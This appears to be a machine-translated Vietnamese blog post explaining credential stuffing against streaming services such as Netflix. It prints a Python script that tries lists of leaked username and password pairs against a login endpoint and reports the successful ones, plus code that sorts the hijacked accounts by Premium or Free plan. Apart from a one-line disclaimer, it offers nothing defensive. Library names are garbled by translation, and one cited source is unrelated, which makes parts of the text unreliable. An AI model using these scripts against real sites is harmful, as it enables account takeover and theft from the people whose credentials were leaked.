Credential Stuffing 101: Cách tin tặc sử dụng yêu cầu Python để xâm nhập vào tài khoản

Jan 16 2023
Trong lĩnh vực công nghệ, các doanh nghiệp thường xuyên có nguy cơ trở thành con mồi cho các hoạt động xấu xa của tội phạm mạng. Một chiến thuật như vậy đã trở nên thường xuyên một cách đáng báo động là nhồi thông tin xác thực.
Nguồn: https://www.mediapost.com/publications/article/355089/ctv-gains-stronger-foothold-in-subscription-servic.html

Trong lĩnh vực công nghệ, các doanh nghiệp thường xuyên có nguy cơ trở thành con mồi cho các hoạt động xấu xa của tội phạm mạng. Một chiến thuật như vậy đã trở nên thường xuyên một cách đáng báo động là nhồi thông tin xác thực. Thủ đoạn xấu xa này liên quan đến việc tin tặc sử dụng các công cụ tự động để thử một số lượng lớn kết hợp tên người dùng và mật khẩu trên nhiều nền tảng trực tuyến khác nhau với mục đích giành được quyền truy cập bất hợp pháp. Hình thức tội phạm mạng này đã nhắm mục tiêu vào một số công ty phát trực tuyến nổi bật nhất, bao gồm Netflix, Hulu, Spotify, v.v.

Ví dụ: Netflix, dịch vụ phát trực tuyến phổ biến, đã chứng kiến ​​sự gia tăng các cuộc tấn công nhồi thông tin xác thực trong vài năm qua. Công ty đã phải thực hiện các biện pháp bảo mật nghiêm ngặt để bảo vệ thông tin cá nhân của người dùng và ngăn chặn truy cập trái phép. Tuy nhiên, bất chấp những nỗ lực này, tin tặc vẫn tiếp tục tìm ra những cách mới để vượt qua các biện pháp này và truy cập vào nền tảng. Trong bài viết này, chúng ta sẽ tìm hiểu sâu hơn về các quy trình và phương pháp liên quan đến việc nhồi thông tin xác thực.

Để thực sự nắm bắt được khái niệm về các cuộc tấn công nhồi thông tin xác thực, điều quan trọng là phải hiểu rõ về các yêu cầu HTTP. Đây là những tin nhắn đơn giản được gửi bởi máy khách, chẳng hạn như trình duyệt web, tới máy chủ, yêu cầu máy chủ truy xuất hoặc gửi thông tin. Có nhiều loại yêu cầu HTTP khác nhau, mỗi loại có một mục đích cụ thể. Khi người dùng gửi yêu cầu HTTP đến máy chủ web, máy chủ sẽ phản hồi bằng dữ liệu, chẳng hạn như HTML hoặc JSON, sau đó được hiển thị trên thiết bị của người dùng. Với sự trợ giúp của mô-đun Yêu cầu của Python, chúng ta có thể thao tác và phân tích các yêu cầu HTTP này để hiểu rõ hơn về sự nguy hiểm của các cuộc tấn công nhồi thông tin xác thực.

Mô-đun yêu cầu Python là người bạn tốt nhất của nhà phát triển, giúp dễ dàng điều hướng thế giới yêu cầu HTTP chỉ bằng một vài dòng mã. Cho dù bạn đang tìm cách trích xuất dữ liệu từ một trang web, làm việc với API hay chỉ đơn giản là tải xuống một tệp, mô-đun yêu cầu sẽ giúp bạn. Một trong những tính năng nổi bật của nó là cách tiếp cận đơn giản. Chỉ với một vài lệnh đơn giản, bạn có thể truy cập nhiều yêu cầu HTTP khác nhau, bao gồm GET, POST, PUT, DELETE, HEAD, OPTIONS và PATCH. Ngoài ra, nó còn cung cấp các lợi ích bổ sung như xử lý chuyển hướng, khắc phục lỗi, đặt thời gian chờ, làm việc với proxy và quản lý chứng chỉ SSL. Với mô-đun yêu cầu Python, bạn sẽ có mọi thứ cần thiết để thực hiện bất kỳ dự án nào.

Ví dụ: để tải xuống trang chủ của một trang web, bạn có thể sử dụng đoạn mã sau:

import requests

response = requests.get("https://www.example.com")
print(response.text)

Nguồn: https://www.comparitech.com/blog/information-security/credential-stuffing-attacks/

Nhồi thông tin xác thực là một kỹ thuật độc hại được tội phạm mạng sử dụng để giành quyền truy cập trái phép vào một số lượng lớn tài khoản bằng cách khai thác danh sách kết hợp tên người dùng-mật khẩu bị xâm phạm. Những danh sách này được mua thông qua nhiều phương tiện khác nhau, chẳng hạn như tấn công SQL injection trên trang web, giao dịch web tối hoặc vi phạm dữ liệu.

Một phương pháp có thể đạt được mục tiêu này là tự động hóa quy trình gửi yêu cầu đăng nhập đến một trang web được nhắm mục tiêu bằng các công cụ như mô-đun Yêu cầu của Python. Trước tiên, kẻ tấn công có được danh sách thông tin đăng nhập bị xâm phạm, thường có được thông qua vi phạm dữ liệu, lừa đảo trực tuyến hoặc chiến thuật kỹ thuật xã hội. Sau đó, họ tạo một tập lệnh Python sử dụng mô-đun Yêu cầu để gửi yêu cầu đăng nhập đến trang web được nhắm mục tiêu, sử dụng các cặp mật khẩu-tên người dùng từ danh sách thông tin đăng nhập bị xâm phạm.

Tập lệnh sẽ thực hiện lặp lại thông qua danh sách thông tin đăng nhập, sau đó gửi yêu cầu đăng nhập cho từng cặp thông tin đăng nhập, sau đó xác minh phản hồi để xác định xem đăng nhập thành công hay không. Trong trường hợp đăng nhập thành công, kẻ tấn công sẽ có quyền truy cập vào tài khoản mà không được phép.

Một ví dụ về cách điều này có thể được thực hiện trong Python bằng mô-đun Yêu cầu là:

#importing the requests module
import requests

#user credentials
credentials = [
  {"username": "user1", "password": "password1"},
  {"username": "user2", "password": "password2"},
  {"username": "user3", "password": "password3"}
]

#looping each pair of credentials and performing the request to the target website
for cred in credentials:
  session = requests.Session()
  login_data = {"username": cred["username"], "password": cred["password"]}
  login_response = session.post("https://example.com/login", data=login_data)
 
 #checking successful/failure response or login attempt
  if login_response.status_code == 200:
    print(f"Successful login with {cred['username']}:{cred['password']}")
  else:
    print(f"Failed login with {cred['username']}:{cred['password']}")

Lưu ý: Không nên sử dụng tập lệnh trên cho bất kỳ hoạt động bất hợp pháp nào và điều này chỉ dành cho mục đích giáo dục.

Điều này có thể được thực hiện bằng nhiều ngôn ngữ lập trình khác nhau, chẳng hạn như Python, JavaScript hoặc C#, bằng cách sử dụng các thư viện và mô-đun dành riêng cho ngôn ngữ đó. Ví dụ,

 • Trong Python, thư viện “yêu cầu” có thể được sử dụng để tạo các yêu cầu HTTP tới trang đăng nhập của trang web và thư viện “đẹpsoup4” có thể được sử dụng để phân tích cú pháp phản hồi HTML cho các phần tử cụ thể, chẳng hạn như biểu mẫu đăng nhập.
 • JavaScript cũng có thể được sử dụng để tự động hóa các yêu cầu đăng nhập và phân tích cú pháp HTML bằng các thư viện như “axios” và “cheerio”.
 • Tương tự, C# có thể được sử dụng để tự động hóa yêu cầu đăng nhập bằng cách sử dụng HttpWebRequest và phân tích cú pháp HTML bằng HTMLAgilityPack.

Một ví dụ về giao diện của API:

"https://www.example.com/subscriptionInfo"
"https://www.example.com/userInfo"
"https://www.example.com/devicesDetails"

Một ví dụ về dữ liệu phản hồi JSON cho mã thông báo truy cập đăng ký API của trang web có thể giống như sau:

{
 "access_token": "abcd12345678",
 "expires_in": 3600,
 "token_type": "Bearer",
 "refresh_token": "ijkl9101mno2132"
}

{
 "subscription_id": "12345",
 "plan_name": "Premium",
 "start_date": "2022-01-01",
 "end_date": "2023-01-01",
 "price": "$9.99/month",
	"renewal":"true",
 "payment_method": "credit card",
 "billing_address": {
  "name": "John Smith",
  "address_line1": "123 Main St.",
  "city": "New York",
  "state": "NY",
  "zip": "10001",
  "country": "USA",
 },
 "devices": [
  { "device_name": "iPhone", "device_id": "A1B2C3" },
  { "device_name": "iPad", "device_id": "D4E5F6" }
 ]
}

Ví dụ: họ có thể sử dụng mã sau để lọc ra các tài khoản miễn phí và trả phí:

import json
data = json.loads(response.text)
if data['plan_name'] == "Premium":
  print("Premium account found: ", data['subscription_id'])
elif data['plan_name'] == "Free":
  print("Free account found: ", data['subscription_id'])

© Copyright 2021 - 2023 | vngogo.com | All Rights Reserved